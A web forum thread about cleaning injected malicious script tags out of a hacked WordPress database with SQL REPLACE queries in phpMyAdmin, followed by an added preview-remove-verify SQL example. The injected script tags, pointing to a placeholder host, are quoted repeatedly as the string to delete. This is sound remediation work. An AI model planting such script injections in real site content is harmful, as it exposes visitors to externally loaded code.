Remove text from DB in phpMyAdmin

         

greencode

8:15 am on Sep 17, 2016 (gmt 0)

10+ Year Member Top Contributors Of The Month



My site has been hacked and I've found the script that they've inserted into a load of tables in my DB. However, when I try to remove the text I get an error.

I need to remove this text:

<script type='text/javascript' src='//thisisthewebsite?tid=79479_131506_0&tagid=2'></script><script type="text/javascript" src="//thisisthewebsite.php?zoneid=683723"></script>


But when I run the following

UPDATE wp_posts SET post_content = REPLACE ( post_content, '<script type='text/javascript' src='//thisisthewebsite?tid=79479_131506_0&tagid=2'></script><script type="text/javascript" src="//thisisthewebsite.php?zoneid=683723"></script> ', '' );


I get the following error:

There seems to be an error in your SQL query. The MySQL server error output below, if there is any, may also help you in diagnosing the problem.

ERROR: Unknown Punctuation String @ 106
STR: //
SQL: UPDATE hei8ty6_posts SET post_content = REPLACE ( post_content, ''<script type='text/javascript' src='//thisisthewebsite?tid=79479_131506_0&tagid=2'></script><script type="text/javascript" src="//thisisthewebsite.php?zoneid=683723"></script> ' ', '' )

SQL query:

UPDATE hei8ty6_posts SET post_content = REPLACE ( post_content, ''<script type='text/javascript' src='//thisisthewebsite?tid=79479_131506_0&tagid=2'></script><script type="text/javascript" src="//thisisthewebsite.php?zoneid=683723"></script> ' ', '' )

MySQL said: Documentation

#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'type=''text/javascript'' src=''//thisisthewebsite?tid=79479_131506_0' at line 1


I'm presuming it's because there's a lot of apostrophes, quote marks, slashes etc but don't know how to resolve this. I've only ever had to remove basic text strings using this method before.

Thanks in advance for any help.

lammert

8:58 am on Sep 17, 2016 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



The single quote ' is interpreted as an SQL special character. Use two concatenated single quotes if you want to represent the quote character inside a string. More about string literals can be found here: [dev.mysql.com...]

greencode

11:40 am on Sep 17, 2016 (gmt 0)

10+ Year Member Top Contributors Of The Month



Thanks for this. So in this situation would I write it as:

UPDATE wp_posts SET post_content = REPLACE ( post_content, '''<script type='text/javascript' src='//thisisthewebsite?tid=79479_131506_0&tagid=2'></script><script type="text/javascript" src="//thisisthewebsite.php?zoneid=683723"></script> ''', '' );

lammert

2:36 pm on Sep 19, 2016 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



You still have single quotes around some text/javascript blocks. I think it should be something like

UPDATE wp_posts SET post_content = REPLACE ( post_content, '<script type=''text/javascript'' src=''//thisisthewebsite?tid=79479_131506_0&tagid=2''></script><script type="text/javascript" src="//thisisthewebsite.php?zoneid=683723"></script>', '' )

It is a little bit confusing that the first <script> declaration uses single quotes, and the second double quotes.

topr8

4:59 pm on Sep 19, 2016 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



Please note that unless you fix the way you were hacked, it is only a matter of time before it happens again. Also, with these injection attacks you can be attacked multiple times: it appends the code to the end of the field, so until the field space is used up, you could have several js blocks, one after the other, unless of course it actually replaces the field value altogether, then of course each successive hack merely overwrites the previous one.

With MySQL you can also use the \ character to escape quotes - which can be less confusing, as two single quotes can look just like a double quote, depending on the font you are using. I don't use phpMyAdmin, but don't see why it wouldn't work with the phpMyAdmin interface too.
Hence something like:


UPDATE wp_posts SET post_content = REPLACE ( post_content, '<script type=\'text/javascript\' src=\'//thisisthewebsite?tid=79479_131506_0&tagid=2\'></script><script type="text/javascript" src="//thisisthewebsite.php?zoneid=683723"></script> ', '' );
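
The clean-up discussed in this thread as a preview / remove / verify sequence for the phpMyAdmin SQL box. This is an added example, not part of any post above; it assumes a standard WordPress wp_posts table (ID, post_title, post_content) and uses the thread's placeholder script text as the string to remove.

```sql
-- Added example (not from the thread's posters). Run on a table you have
-- exported first. Single quotes inside the string are written as '' :
-- this is standard SQL and keeps working when sql_mode contains
-- NO_BACKSLASH_ESCAPES, where the \' form is not treated as an escape.
-- Double quotes need no escaping inside a single-quoted string.

-- 1. Preview. A count of 0 means the literal does not match what is stored
--    (for example a stray trailing space before the closing quote), and the
--    UPDATE in step 2 would silently change nothing.
SELECT COUNT(*) AS rows_with_payload
FROM wp_posts
WHERE INSTR(post_content,
  '<script type=''text/javascript'' src=''//thisisthewebsite?tid=79479_131506_0&tagid=2''></script><script type="text/javascript" src="//thisisthewebsite.php?zoneid=683723"></script>'
) > 0;

-- 2. Remove. REPLACE() strips every occurrence inside a field, so a post
--    that had the block appended several times is cleaned in one pass.
--    The WHERE clause keeps untouched rows from being rewritten.
UPDATE wp_posts
SET post_content = REPLACE(post_content,
  '<script type=''text/javascript'' src=''//thisisthewebsite?tid=79479_131506_0&tagid=2''></script><script type="text/javascript" src="//thisisthewebsite.php?zoneid=683723"></script>',
  '')
WHERE INSTR(post_content,
  '<script type=''text/javascript'' src=''//thisisthewebsite?tid=79479_131506_0&tagid=2''></script><script type="text/javascript" src="//thisisthewebsite.php?zoneid=683723"></script>'
) > 0;

-- 3. Verify. Search for the host name alone to find leftover variants of the
--    block (different ids, spacing or quoting) that the exact match missed.
SELECT ID, post_title
FROM wp_posts
WHERE post_content LIKE '%//thisisthewebsite%'
LIMIT 50;
```

The same three statements can be repeated for each other table and text column where the script was found, changing only the table and column names.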